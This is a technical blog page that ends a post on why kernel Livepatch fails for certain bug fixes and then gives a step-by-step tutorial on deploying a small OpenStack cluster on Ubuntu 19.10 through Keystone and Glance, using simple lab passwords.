Now, I really wanted to make a Livepatch to fix a real bug, but for the moment I must admit defeat.

I went into writing this blog post thinking that Livepatch could be an awesome tool to help fix customer issues, but the problem is, there are some severe limitations as to what can be Livepatched, and even when you believe a patch could be compatible, a GCC optimisation could completely ruin your plans.

I have two examples.

Example One: Inline Functions

The first, is a bug that was actually a regression to the SRU I made for the bug fixed by my previous blog post, Resolving Large NVMe Performance Degradation in the Ubuntu 4.4 Kernel.

Anyway, the bug is documented by my colleague who I worked the case with:

Mounting LVM snapshots with xfs can hit kernel BUG in nvme driver.

commit 5a8d75a1b8c99bdc926ba69b7b7dbe4fae81a5af
Author: Ming Lei <ming.lei@redhat.com>
Date:   Fri Apr 14 13:58:29 2017 -0600
Subject: block: fix bio_will_gap() for first bvec with offset

You can read the commit here: block: fix bio_will_gap() for first bvec with offset.

The important part is the three function prototypes in each changed function:

-static inline bool bio_will_gap(struct request_queue *q, struct bio *prev,
-                        struct bio *next)
+static inline bool bio_will_gap(struct request_queue *q,
+                               struct request *prev_rq,
+                               struct bio *prev,
+                               struct bio *next)

static inline bool req_gap_back_merge(struct request *req, struct bio *bio)

static inline bool req_gap_front_merge(struct request *req, struct bio *bio)

Inlined functions. Sometimes these will work, as the callers will just embed the code in them. Most of the time they won’t though.

The thing is, the kernel redefines the meaning of inline in include/linux/compiler_types.h:

#if !defined(CONFIG_OPTIMIZE_INLINING)
#define inline inline __attribute__((__always_inline__)) __gnu_inline \
        __inline_maybe_unused notrace
#else
#define inline inline                                    __gnu_inline \
        __inline_maybe_unused notrace
#endif

We see that if you select inline, you also get notrace. Only tracable functions can be Livepatched as we know, meaning that this is a dead end if you are not using tools like kpatch-build. Most patches like this will mostly error out with kpatch-build too.

Example Two: GCC Optimisations

The next bug is a neat little Null pointer dereference if you have the sysctl kernel.core_pattern set to “|” and run a program which crashes.

You can read all about it here:

unkillable process (kernel NULL pointer dereference)

There’s a patch made by Sudip Mukherjee which was more elegant than the one I put forward in the process of getting mainlined now. You can see it here:

diff --git a/fs/coredump.c b/fs/coredump.c
index f8296a82d01d..408418e6aa13 100644
--- a/fs/coredump.c
+++ b/fs/coredump.c
@@ -211,6 +211,8 @@ static int format_corename(struct core_name *cn, struct coredump_params *cprm,
 			return -ENOMEM;
 		(*argv)[(*argc)++] = 0;
 		++pat_ptr;
+		if (!(*pat_ptr))
+			return -ENOMEM;
 	}
 
 	/* Repeat as long as we have more pattern to process and more output

Now, if we run kpatch-build over this:

$ kpatch/kpatch-build/kpatch-build -t vmlinux --vmlinux /lib/debug/boot/vmlinux-5.4.0-24-generic  ~/corename.patch 
Using cache at /home/matthew/.kpatch/src
Testing patch file(s)
Reading special section data
readelf: Error: LEB value too large
readelf: Error: LEB value too large
Building original source
Building patched source
Extracting new and modified ELF sections
coredump.o: changed function: do_coredump
/home/matthew/work/kernel/kpatch/kpatch-build/create-diff-object: ERROR: coredump.o: find_local_syms: 175: find_local_syms for coredump.c: couldn't find in vmlinux symbol table
ERROR: 1 error(s) encountered. Check /home/matthew/.kpatch/build.log for more details.

It fails! Why does it say the changed function was do_coredump(), when the above patch clearly patches format_corename()? There are no inlined functions here.

To get some answers, we need to look at the vmlinux binaries to see what symbols are exported.

$ readelf -s /lib/debug/boot/vmlinux-5.4.0-24-generic
...
0000000000000000     0 FILE    LOCAL  DEFAULT  ABS coredump.c
ffffffff8247f938     0 NOTYPE  LOCAL  DEFAULT   13 __ksymtab_dump_emit
ffffffff824a80eb    10 OBJECT  LOCAL  DEFAULT   17 __kstrtab_dump_emit
ffffffff8247f95c     0 NOTYPE  LOCAL  DEFAULT   13 __ksymtab_dump_skip
ffffffff824a80e1    10 OBJECT  LOCAL  DEFAULT   17 __kstrtab_dump_skip
ffffffff8247f92c     0 NOTYPE  LOCAL  DEFAULT   13 __ksymtab_dump_align
ffffffff824a80d6    11 OBJECT  LOCAL  DEFAULT   17 __kstrtab_dump_align
ffffffff8247f974     0 NOTYPE  LOCAL  DEFAULT   13 __ksymtab_dump_truncate
ffffffff824a80c8    14 OBJECT  LOCAL  DEFAULT   17 __kstrtab_dump_truncate
ffffffff813610b0   156 FUNC    LOCAL  DEFAULT    1 umh_pipe_setup
ffffffff81361150   208 FUNC    LOCAL  DEFAULT    1 zap_process
ffffffff813612e0   100 FUNC    LOCAL  DEFAULT    1 expand_corename.isra.0
ffffffff827144c0     4 OBJECT  LOCAL  DEFAULT   24 core_name_size
ffffffff81361350   195 FUNC    LOCAL  DEFAULT    1 cn_vprintf
ffffffff81361420   106 FUNC    LOCAL  DEFAULT    1 cn_printf
ffffffff81361490   247 FUNC    LOCAL  DEFAULT    1 cn_esc_printf
ffffffff82d3f560  4096 OBJECT  LOCAL  DEFAULT   54 zeroes.62762
ffffffff81361660  1383 FUNC    LOCAL  DEFAULT    1 format_corename.isra.0
ffffffff81361bd0    36 FUNC    LOCAL  DEFAULT    1 kmalloc_array.constprop.0
ffffffff82d40560     0 OBJECT  LOCAL  DEFAULT   54 __key.10435
ffffffff82d40560     4 OBJECT  LOCAL  DEFAULT   54 core_dump_count.62719
ffffffff81362730    56 FUNC    LOCAL  DEFAULT    1 do_coredump.cold
ffffffff82079530    12 OBJECT  LOCAL  DEFAULT    7 __func__.62732
...

Next, the freshly built vmlinux:

$ readelf -s ~/.kpatch/src/vmlinux
...
0000000000000000     0 FILE    LOCAL  DEFAULT  ABS coredump.c
ffffffff8248f918     0 NOTYPE  LOCAL  DEFAULT 97899 __ksymtab_dump_emit
ffffffff824b80cb    10 OBJECT  LOCAL  DEFAULT 97903 __kstrtab_dump_emit
ffffffff8248f93c     0 NOTYPE  LOCAL  DEFAULT 97899 __ksymtab_dump_skip
ffffffff824b80c1    10 OBJECT  LOCAL  DEFAULT 97903 __kstrtab_dump_skip
ffffffff8248f90c     0 NOTYPE  LOCAL  DEFAULT 97899 __ksymtab_dump_align
ffffffff824b80b6    11 OBJECT  LOCAL  DEFAULT 97903 __kstrtab_dump_align
ffffffff8248f954     0 NOTYPE  LOCAL  DEFAULT 97899 __ksymtab_dump_truncate
ffffffff824b80a8    14 OBJECT  LOCAL  DEFAULT 97903 __kstrtab_dump_truncate
ffffffff814baff0   156 FUNC    LOCAL  DEFAULT 8647 umh_pipe_setup
ffffffff81761a10   208 FUNC    LOCAL  DEFAULT 32162 zap_process
ffffffff81761ba0   100 FUNC    LOCAL  DEFAULT 32166 expand_corename.isra.0
ffffffff8276d518     4 OBJECT  LOCAL  DEFAULT 106303 core_name_size
ffffffff81761c10   195 FUNC    LOCAL  DEFAULT 32168 cn_vprintf
ffffffff81761ce0   106 FUNC    LOCAL  DEFAULT 32170 cn_printf
ffffffff81761d50   247 FUNC    LOCAL  DEFAULT 32172 cn_esc_printf
ffffffff83017f60  4096 OBJECT  LOCAL  DEFAULT 117495 zeroes.62762
ffffffff82ec62d0     0 OBJECT  LOCAL  DEFAULT 116793 __key.10435
ffffffff83018f60     4 OBJECT  LOCAL  DEFAULT 117496 core_dump_count.62719
ffffffff81761f16    27 FUNC    LOCAL  DEFAULT 32178 do_coredump.cold
ffffffff822adba0    12 OBJECT  LOCAL  DEFAULT 97893 __func__.62732
...

If you look closely, the original vmlinux has the following two symbols:

 30010: ffffffff81361660  1383 FUNC    LOCAL  DEFAULT    1 format_corename.isra.0
 30011: ffffffff81361bd0    36 FUNC    LOCAL  DEFAULT    1 kmalloc_array.constprop.0

While the built one does not! There are missing symbols in our freshly built vmlinux binaries. This is likely down to the “ISRA” optimisation round which GCC does. Maybe compiler flags are slightly different between builds. I am not sure. All I do know, is that this patch has problems.

Limitations in Livepatch

As we can see, there are some real limitations to which patches are suitable for Livepatch. This is probably the biggest reason why Livepatches are reserved for security fixes only, since most normal fixes won’t work.

The best cheat sheet for what patches work is the Patch Author Guide in the kpatch repository.

As soon as I can fix a real bug with Livepatch, I will write a follow up blogpost.

Installing and Configuring Livepatch on Ubuntu

Interested in using Livepatch in your production environment, but don’t want to navigate all the complexity behind researching compatible patches, writing or generating Livepatch modules, testing for regressions or scaling deployment?

Well, you can use the Canonical Livepatch Service.

The Canonical Livepatch Service is easy to set up, and automatically delivers critical security fixes to your machines. These Livepatches have been thoroughly tested and are safe to use.

You can find a list of supported distribution releases and kernel versions on the Livepatch Wiki page.

The rule of thumb is that Livepatch is available for LTS GA kernels, and HWE kernels which are from the next LTS GA kernel.

So for example, 4.4 GA kernel on Xenial, or the 4.15 HWE kernel on xenial, since it was Bionic’s GA kernel. Bionic will have 4.15 and soon, the 5.4 HWE kernel from Focal.

The Canonical Livepatch service is pretty easy to set up. All you need to do is:

Visit the Canonical Livepatch Portal to generate your API key.
Install the Livepatch system daemon with $ sudo snap install canonical-livepatch
Setup Livepatch with the API key: $ sudo canonical-livepatch enable <TOKEN>

You can try Livepatch for free for up to 3 machines, which is pretty neat if you want to use it on your own personal PC or server. If you need to scale for your production environment, then you can sign up for Ubuntu Advantage which includes the Canonical Livepatch Service.

The Datasheet covers any more questions you might have, such as on-premise availability or pricing.

So how do we tell if the Canonical Livepatch Service is working? Well, you can run:

$ canonical-livepatch status
last check: 1 minute ago
kernel: 4.4.0-168.197-generic
server check-in: succeeded
patch state: ✓ all applicable livepatch modules inserted
patch version: 65.1

We can also check dmesg, to see if the module has been inserted correctly:

[  234.112955] lkp_Ubuntu_4_4_0_168_197_generic_65: loading out-of-tree module taints kernel.
[  234.113077] lkp_Ubuntu_4_4_0_168_197_generic_65: module verification failed: signature and/or required key missing - tainting kernel
[  237.331850] livepatch: tainting kernel with TAINT_LIVEPATCH
[  237.331852] livepatch: enabling patch 'lkp_Ubuntu_4_4_0_168_197_generic_65'

We can see that we are running patch version 65.1. What does that mean? How do we see what is in each patch?

Well, you can sign up for the Ubuntu Security Announce mailing list. All new Livepatches are announced here, under [LSN-VERSION] tags. For example, the patch we just installed above is documented here:

[LSN-0065-1] Linux kernel vulnerability

Otherwise you can also browse the source code repositories.

If we have a look at the Xenial 65.1 patch for 4.4.0-168-generic, we have vmx fixes, mwifiex wifi driver fixes, btrfs fixes, and i915 graphics fixes. We can also see that they are built with kpatch-build: Makefile for Xenial 65.1 patch.

Most users probably aren’t interested in what are in their Livepatches, but if you are interested, feel free to review.

Conclusion

Well, there we have it. We looked into how Livepatch works at a semi-technical level, we implemented a few Livepatches of our own and got them working.

It’s a pity that I haven’t managed to make a Livepatch to fix a real bug just yet, since I keep selecting fixes which aren’t compatible, but as soon as I find one which is, I will write another blog post about it.

We also had a look at the Canonical Livepatch Service, and I was pretty happy with how easy it is to operate, compared to the endless trouble of making these modules yourself.

I think Livepatch is a very cool kernel technology, so keep an eye out on future blog posts where I delve into it some more.

I hope you enjoyed the read, and as always, feel free to contact me.

Matthew Ruffell

Deploying an OpenStack Cluster in Ubuntu 19.10

2020-02-13T00:00:00+00:00

The next article in my series of learning about cloud computing is tackling one of the larger and more widely used cloud software packages - OpenStack.

OpenStack is a service which lets you provision and manage virtual machines across a pool of hardware which may have differing specifications and vendors.

Today, we will be deploying a small five node OpenStack cluster in Ubuntu 19.10 Eoan Ermine, so follow along, and let’s get this cluster running.

We will cover what OpenStack is, the services it is comprised of, how to deploy it, and using our cluster to provision some virtual machines.

Let’s get started.

What is OpenStack?

As mentioned previously, OpenStack is a service which lets you provision and manage virtual machines running across a pool of hardware that provide compute, networking or storage resources. This pool of hardware can be made up with differing specifications or multiple vendors, or even different geographical locations. OpenStack is the glue which connects these resources together in a easy to use, secure, cohesive system for provisioning virtual machines to public or private cloud environments.

What are OpenStacks Main Usages?

OpenStacks primary usage is to provide a platform for cloud computing. This can be in the form of public or private clouds. Public clouds are open to the public and anyone can sign up for an account on, and private clouds are typically private and local to a single company.

OpenStack allows users to provision virtual machines of various specifications, with various choices of operating systems in various geographical locations, or Availability Zones. OpenStack gives the users the ability to build virtual networks for their virtual machines to be connected to, and to specify how those networks operate with allowing easy configuration of virtual routers, switches and the like.

OpenStack takes care of all storage requirements, and offers backends for block and object storage, which can be utilised by the virtual machines themselves, and the applications running ontop of it.

OpenStack Architecture

Like Ceph, OpenStack is not a monolithic program. Instead, it is comprised of a set of specialised individual services, which are further split into a set of sub-services. The best way to grasp the complexity of OpenStack is by looking at an example logical architecture diagram provided in the OpenStack Documentation.

We are going to focus on the following core services:

Horizon, a central dashboard where users can manage resource and provision virtual machines.
Keystone, an identity and authentication service which implements fine tuned permissions and access control.
Nova, a compute engine which hosts the virtual machines being provisioned.
Neutron, which implements networking as a service, which can create virtual networks and virtual network interfaces that can be attached to virtual machines managed by nova.
Glance, an image service which stores, fetches and provides operating system images for the virtual machines.
Cinder, a block storage service which delivers highly available and fault tolerant block storage for use with virtual machines.
Swift, a object storage backend which consumes and stores single objects quickly and efficiently.

Each of these core services appear on the example logical architecture diagram encased within dotted lines. These lines show the border between what we consider the logical unit for a service, like nova, and the smaller sub-services which nova is comprised of.

Every OpenStack service will have a API sub-service, which is the endpoint which OpenStack services use to communicate with each other. Most OpenStack services will also have its own database to store state and information required by the sub-services.

Otherwise, sub-services are specific to the service itself. If we look at Nova, we see sub-services nova-scheduler, nova-console, nova-cert, nova-compute, nova-consoleauth and nova-conductor. Each of there can communicate with other sub-services if necessary, and use central resources, like the Nova database and the work queue. Each of these sub-services are separated into their own process, and can be stopped, started and restarted independently of the other sub-services.

Architecture of the Cluster We Will Build

Today, we are going to deploy OpenStack on a small 5 node cluster which will be made of virtual machines. I highly recommend you use a desktop computer for this as we are going to need a lot of ram and disk space.

We will have five machines and two networks. Our machines will be controller, compute, block-storage, object-storage-1 and object-storage-2. The names are fairly self explanatory, and we can see the services each will be running in the diagram.

For the networks, we will have a management network and a provider network. The management network will be used for administrative tasks, such as OpenStack services communicating between themselves via their API endpoints. The provider network is the virtual network that instances will have their virtual NICs attached to.

Once the installation is done, we will be accessing the cluster through the horizon web interface through the controller machine.

Deploying the Cluster

Okay, let’s get moving. Time to fire up some virtual machines and start configuring our cluster.

Setting Up Internal Networks

As mentioned previously, we will have two networks, the management network and the provider network. I’m going to be using the defaults suggested in the OpenStack Installation Guide especially when it comes to the provider network.

The networks and their CIDRs will be:

Management Network - 10.0.0.0/24
Provider Network - 203.0.113.0/24

These networks need to be created in your virtualisation software. I’m using virt-manager, and you can do this by going to Edit > Connection Details... then making a new virtual network.

These networks will be internal networks for now. We will also attach a normal NAT network to our VMs while we get things up and running, but we will remove this when we are done, to leave us with an isolated cluster.

Go ahead and make both the management and provider networks.

When you are done, you will have three networks.

Install Ubuntu Server

Create five virtual machines with the following specs:

controller: 4gb ram, 1 vcpu, 10gb disk.
compute: 4gb ram, 1 vcpu, 10gb disk.
block-storage: 4gb ram, 1 vcpu, 10gb disk, 10gb disk.
object-storage-1: 4gb ram, 1 vcpu, 10gb disk, 10gb disk, 10gb disk.
object-storage-2: 4gb ram, 1 vcpu, 10gb disk, 10gb disk, 10gb disk.

If you are low on ram or disk space, you can shave some specs off the block storage and object storage machines.

Attach the management network to all the machines. Attach the provider network to the controller and compute machines. Probably best to do this before you start the installation.

Go ahead and install Ubuntu 19.10 Eoan Ermine Server on them:

Make sure to say yes to installing openssh-server when asked. We will be needing it.

Configure Ubuntu Server

After the install is done, we need to configure some networking on our fresh installs.

Setting Up Machine Networking

Nothing too fancy here, we are going to set up a static IP for our interfaces.

Recent versions of Ubuntu server use netplan for its networking, which can take some getting used to. It’s okay though, its not hard.

If you go to /etc/netplan, there will be a file called 50-cloud-init.yaml.

cloud-init will have pre-populated it with all current network interfaces:

# This file is generated from information provided by
# the datasource.  Changes to it will not persist across an instance.
# To disable cloud-init's network configuration capabilities, write a file
# /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:
# network: {config: disabled}
network:
    ethernets:
        enp1s0:
            dhcp4: true
        enp2s0:
            dhcp4: true
        enp3s0:
            dhcp4: true
    version: 2

We want our management and provider networks to have static IP addresses, so the first thing is to determine what these interfaces are.

If you run ip addr, you will see something like:

1: lo:
    inet 127.0.0.1/8 scope host lo
2: enp1s0:
    inet 192.168.122.13/24 brd 192.168.122.255 scope global dynamic enp1s0
3: enp2s0:
    inet 10.0.0.155/24 brd 10.0.0.255 scope global dynamic enp2s0
4: enp3s0: 
    inet 203.0.113.249/24 brd 203.0.113.255 scope global dynamic enp3s0

I cleaned up the output, since let’s face it, ip addr gives us information overload, while ifconfig had nice output. Rest in peace ifconfig.

We see enp1s0 is the NAT network, enp2s0 is management network and enp3s0 is the provider network.

Our nodes will have the following static IPs:

controller: management: 10.0.0.11, provider: 203.0.113.11
compute: management: 10.0.0.21, provider: 203.0.113.21
block-storage: management: 10.0.0.31
object-storage-1: management: 10.0.0.41
object-storage-2: management: 10.0.0.51

So we need to edit our netplan configuration like this, for our controller:

# This file is generated from information provided by
# the datasource.  Changes to it will not persist across an instance.
# To disable cloud-init's network configuration capabilities, write a file
# /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:
# network: {config: disabled}
network:
    ethernets:
        enp1s0:
            dhcp4: true
        enp2s0:
            dhcp4: true
            addresses: [10.0.0.11/24]
        enp3s0:
            dhcp4: true
            addresses: [203.0.113.11/24]
    version: 2

When we are done, we can apply the changes with:

$ sudo netplan apply

Reboot your machine, and when it comes back up, if we log in, we should see our static IPs in place:

Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-26-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 26 Jan 2020 09:48:36 PM UTC

  System load:  0.98              Users logged in:       0
  Usage of /:   41.8% of 9.78GB   IP address for enp1s0: 192.168.122.13
  Memory usage: 4%                IP address for enp2s0: 10.0.0.11
  Swap usage:   0%                IP address for enp3s0: 203.0.113.11
  Processes:    131


0 updates can be installed immediately.
0 of these updates are security updates.


Last login: Sun Jan 26 21:39:04 2020 from 192.168.122.1

Not too bad at all! Now go and do the same for the rest of the machines.

Configure the Hosts File

Edit /etc/hosts on all the machines and place the following inside it:

0.0.11 controller
0.113.11 controller-api

0.0.21 compute
0.113.21 compute-api

0.0.31 block-storage

0.0.41 object-storage-1

0.0.51 object-storage-2

There will likely be an entry with the machine’s hostname at the top, that redirects back to localhost. Something like 127.0.0.1 controller. Make sure to comment out this line, because we want controller to mean 10.0.0.11 instead.

That should make things easier for us later on.

Set Up NTP For Stable Timekeeping

It can be useful for all our boxes have an aligned time, since OpenStack requires a consistent time across all machines. We will use chrony, with the controller as the master NTP server.

On all machines, install chrony:

$ sudo apt install chrony

The controller will have internet access, so we will configure the machines to connect to the controller for NTP.

On the controller, edit /etc/chrony/chrony.conf and place the following at the end:

$ sudo vim /etc/chrony/chrony.conf
...
# Allow our internal networked machines access to our chrony server
allow 10.0.0.0/24

Now we can configure the other machines to connect to the controller for NTP. For all the configured “pools”, we need to comment them out, and set the server to be the controller instead.

$ sudo vim /etc/chrony/chrony.conf
...
# Comment out the default pools:
#pool ntp.ubuntu.com        iburst maxsources 4
#pool 0.ubuntu.pool.ntp.org iburst maxsources 1
#pool 1.ubuntu.pool.ntp.org iburst maxsources 1
#pool 2.ubuntu.pool.ntp.org iburst maxsources 2
# Use the controller as the NTP master server
server controller iburst

Save. Once that is done, we need to restart chrony on all systems:

$ sudo systemctl restart chrony

We can check the other machines get their time from the controller with:

$ chronyc sources
210 Number of sources = 1
MS Name/IP address         Stratum Poll Reach LastRx Last sample               
===============================================================================
^* controller                    2   6    37    20    +20ns[ -214us] +/-   12ms

We should get something like this.

Installing OpenStack Client Packages

We will be using the python OpenStack client to deploy our cluster, so go ahead and install it on all machines:

$ sudo apt install python3-openstackclient

Installing a Database on the Controller

We need to install a database on the controller, so let’s use mariadb:

$ sudo apt install mariadb-server python3-pymysql

Let’s put some basic configuration in it:

$ sudo vim /etc/mysql/mariadb.conf.d/99-openstack.cnf
[mysqld]
bind-address = 10.0.0.11
default-storage-engine = innodb
innodb_file_per_table = on
max_connections = 4096
collation-server = utf8_general_ci
character-set-server = utf8

Then we restart the service:

$ sudo systemctl restart mysql

All that’s left is to clear out the demo users and set a root database password:

$ sudo mysql_secure_installation

When asked for the root password, it will be blank. When we want to set a root password, use something decent, but if your doing this for fun, like I am, then it probably doesn’t matter too much. We will use password123.

From there, say yes to the defaults.

Installing a Messaging Queue on the Controller

We also need a messaging queue on the controller, so let’s use rabbitmq.

$ sudo apt install rabbitmq-server

Let’s add a user:

$ sudo rabbitmqctl add_user openstack password123
Adding user "openstack" ...

And let the openstack user have all permissions to the queue:

$ sudo rabbitmqctl set_permissions openstack ".*" ".*" ".*"
Setting permissions for user "openstack" in vhost "/" ...

Installing Memcached to the Controller

We will be using memcached to cache parts of horizon, so go ahead and install it on the controller:

$ sudo apt install memcached python3-memcache

We need to edit the config to use the internal management network, so change the listening address from 127.0.0.1 to 10.0.0.11:

sudo vim /etc/memcached.conf
#-l 127.0.0.1
-l 10.0.0.11

From there restart the memcached service:

$ sudo systemctl restart memcached

Installing OpenStack

OpenStack is a series of services, and we will install them one at a time.

Installing Keystone, the Identity Service

Keystone is the identity service for OpenStack, and it maintains user authentication, user authorisation and the catalogue of currently installed and running OpenStack services, as well as their endpoint information.

Every other OpenStack service has a hard dependency on Keystone for its authentication capabilities, and to get themselves enlisted into the catalogue, so naturally Keystone needs to be installed first.

I’m going to be following the Keystone Installation Tutorial

Making the Keystone Database

Keystone needs a backing database, so open up mysql with:

$ sudo mysql
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 44
Server version: 10.3.20-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

From there make a database:

MariaDB [(none)]> create database keystone;
Query OK, 1 row affected (0.001 sec)

We then need to make a keystone user, and let them have access to the database:

MariaDB [(none)]> grant all privileges on keystone.* to 'keystone'@'localhost'
identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> grant all privileges on keystone.* to 'keystone'@'%'
identified by 'password123';
Query OK, 0 rows affected (0.001 sec)

Installing Keystone Packages

Keystone is available in the Ubuntu main archive, so we can install it with:

$ sudo apt install keystone apache2 libapache2-mod-wsgi-py3

From there, we can configure it by adding some credentials to its configuration file. You will want to jump to the database section, comment out the sqlite connection, and add our mariadb database. Also, under the token section, uncomment the provider = fernet line:

$ sudo vim /etc/keystone/keystone.conf
[database]
#connection = sqlite:////var/lib/keystone/keystone.db
connection = mysql+pymysql://keystone:password123@controller/keystone

[token]
provider = fernet

We can then populate the database with:

$ sudo -s
# su -s /bin/sh -c "keystone-manage db_sync" keystone

Once the database is populated, we need to initialise the fernet key repositories:

$ sudo keystone-manage fernet_setup --keystone-user keystone --keystone-group \
keystone
$ sudo keystone-manage credential_setup --keystone-user keystone --keystone-group \
keystone 

After that, we can bootstrap keystone by telling it where it’s API endpoints will be accessed from, and what our region name will be.

$ sudo keystone-manage bootstrap --bootstrap-password openstack \
--bootstrap-admin-url http://controller:5000/v3/ \
--bootstrap-internal-url http://controller:5000/v3/ \
--bootstrap-public-url http://controller:5000/v3/ \
--bootstrap-region-id RegionOne

Most OpenStack services have three main endpoints, designed to be accessed by users of differing permissions. The admin endpoint is intended by OpenStack administrators, the internal endpoint is for service to service communication, for example, between keystone and nova, and lastly, the public endpoint is for anyone to query.

I used the password “openstack” here, and we will use it for front end OpenStack services. You can use whatever you like, as long as you are consistent.

Just a few last things now. We need to add some configuration to apache:

$ sudo vim /etc/apache2/apache2.conf
ServerName controller

Save, and restart the apache service:

$ sudo systemctl restart apache2

Creating Users, Roles and Projects in Keystone

First up is creating a project. We need to set some environment variables to feed into keystone, like so:

$ export OS_USERNAME=admin
$ export OS_PASSWORD=openstack
$ export OS_PROJECT_NAME=admin
$ export OS_USER_DOMAIN_NAME=Default
$ export OS_PROJECT_DOMAIN_NAME=Default
$ export OS_AUTH_URL=http://controller:5000/v3
$ export OS_IDENTITY_API_VERSION=3

After that, we can go and create some projects:

$ openstack project create --domain default --description "Service Project" service
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | Service Project                  |
| domain_id   | default                          |
| enabled     | True                             |
| id          | c050173209284c80816cab4a42e829bb |
| is_domain   | False                            |
| name        | service                          |
| options     | {}                               |
| parent_id   | default                          |
| tags        | []                               |
+-------------+----------------------------------+
$ openstack project create --domain default --description "Demo Project" demo
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | Demo Project                     |
| domain_id   | default                          |
| enabled     | True                             |
| id          | 33569bb56110474db2d584b4a1936c6b |
| is_domain   | False                            |
| name        | demo                             |
| options     | {}                               |
| parent_id   | default                          |
| tags        | []                               |
+-------------+----------------------------------+

We should make some users that are not administrators to use things normally, so we can make them like so:

$ openstack user create --domain default --password-prompt demo
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | default                          |
| enabled             | True                             |
| id                  | bf0cfff44d3c49cb92d10e5977a9decc |
| name                | demo                             |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+
$ openstack role create user
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | None                             |
| domain_id   | None                             |
| id          | 591b3b65831847a5b7eb60e9bcef0f1c |
| name        | user                             |
| options     | {}                               |
+-------------+----------------------------------+
$ openstack role add --project demo --user demo user

We made a project called demo, and inside that, we made a role called user, and added our account, demo, to that role.

Verifying that Keystone was Installed Correctly

We can check to see if our users and projects are created properly, by unsetting the environment variables we set.

$ unset OS_AUTH_URL OS_PASSWORD

From there, we can request a token for both of our users, admin and demo.

$ openstack --os-auth-url http://controller:5000/v3 \
  --os-project-domain-name Default --os-user-domain-name Default \
  --os-project-name admin --os-username admin token issue
Password: 
+------------+-----------------------------------------------------------------+
| Field      | Value                                                           |
+------------+-----------------------------------------------------------------+
| expires    | 2020-01-27T03:23:56+0000                                        |
| id         | gAAAAABeLkm86gLK4PJXGCrFytreNRz68VT_10sfa9aG8kBWhvWGFM36y9tSrBO |
|            | 8-QagpervkRxePXB0ZgriZ4K7Lh5Ozoe2_JNj9wtlVs4VAfSyb66c35YOGIMaQs |
|            | oKfBGEuYjrfG-22UbT9zWHUw3GoRx37_VBpr13inGQhIBm7HVE9AWv0KI       |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7                                |
| user_id    | c23d6d5a0b8f4dae96f5156d62d62dbd                                |
+------------+-----------------------------------------------------------------+

And the demo user:

$ openstack --os-auth-url http://controller:5000/v3 \
  --os-project-domain-name Default --os-user-domain-name Default \
  --os-project-name demo --os-username demo token issue
Password: 
+------------+-----------------------------------------------------------------+
| Field      | Value                                                           |
+------------+-----------------------------------------------------------------+
| expires    | 2020-01-27T03:28:07+0000                                        |
| id         | gAAAAABeLkq30a-m6Cpcv3U9tBpZyJia4dQXoUhV73QzW9kH08cGzhnIUvWeCv8 |
|            | BE0Nag6Lb4DKgiWXtiSpzSyJaXARwJsWN8U1lHIUG8FA2nQHDHPeVBao8GJgSec |
|            | n9thhc19CMPcK7UUZqlrMm84i8bC4baU08LsG7JvGZ4cPRoEiB-OZVgg        |
| project_id | 33569bb56110474db2d584b4a1936c6b                                |
| user_id    | bf0cfff44d3c49cb92d10e5977a9decc                                |
+------------+-----------------------------------------------------------------+

To make things easier when dealing with different users in our OpenStack cluster, OpenStack has this idea of saving a collection of environment variables for a user into a bash script, and we can source them, and then use them for anything we want.

This is known as “OpenStack client environment scripts”, so let’s take a look. Make two files, one called admin-openrc and the other demo-openrc:

$ vim admin-openrc
export OS_USERNAME=admin
export OS_PASSWORD=openstack
export OS_PROJECT_NAME=admin
export OS_USER_DOMAIN_NAME=Default
export OS_PROJECT_DOMAIN_NAME=Default
export OS_AUTH_URL=http://controller:5000/v3
export OS_IDENTITY_API_VERSION=3
export OS_IMAGE_API_VERSION=2

$ vim demo-openrc
export OS_USERNAME=demo
export OS_PASSWORD=openstack
export OS_PROJECT_NAME=demo
export OS_USER_DOMAIN_NAME=Default
export OS_PROJECT_DOMAIN_NAME=Default
export OS_AUTH_URL=http://controller:5000/v3
export OS_IDENTITY_API_VERSION=3
export OS_IMAGE_API_VERSION=2

Then if we want to change to the admin user, we can just source it:

$ . admin-openrc
$ openstack token issue
+------------+-----------------------------------------------------------------+
| Field      | Value                                                           |
+------------+-----------------------------------------------------------------+
| expires    | 2020-01-27T03:44:52+0000                                        |
| id         | gAAAAABeLk6k6b6CVGwnigP8DF6iZUieU1H_J_Sdhdr0KZaFN4OULhVndFvPt1N |
|            | 5EAReAiAZl7Kmx_16KXkB3fQ4dFr_N5_id3UyEjcqWFsFp2kN5EjtA674ubG4CL |
|            | 3auzXEvlrx5pmS0pl_hd0UQQGO7DfF3vHo-ksvcA9x7rETUS1UfWYXMXE       |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7                                |
| user_id    | c23d6d5a0b8f4dae96f5156d62d62dbd                                |
+------------+-----------------------------------------------------------------+

That actually makes switching user’s pretty easy. Still, you leave creds lying around on your machines the whole time, which makes me uneasy. For our toy cluster it doesn’t matter, but for bigger deployments it is concerning.

Installing Glance, the Image Service

Glance is the image service for OpenStack. It is in charge of discovering, registering and retrieving virtual machine operating system images.

Glance also allows users to build their own images, and take snapshots.

I will be following the Glance Installation Documentation.

Creating the Glance Database

Back to the controller node, since Glance will be installed there as well.

We need to create a database for Glance, so go ahead and open up the mysql monitor, and issue:

$ sudo mysql
MariaDB [(none)]> create database glance;
Query OK, 1 row affected (0.000 sec)

From there, just like with Keystone, we need to make a user, and grant them access the glance database.

MariaDB [(none)]> grant all privileges on glance.* to 'glance'@'localhost' identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
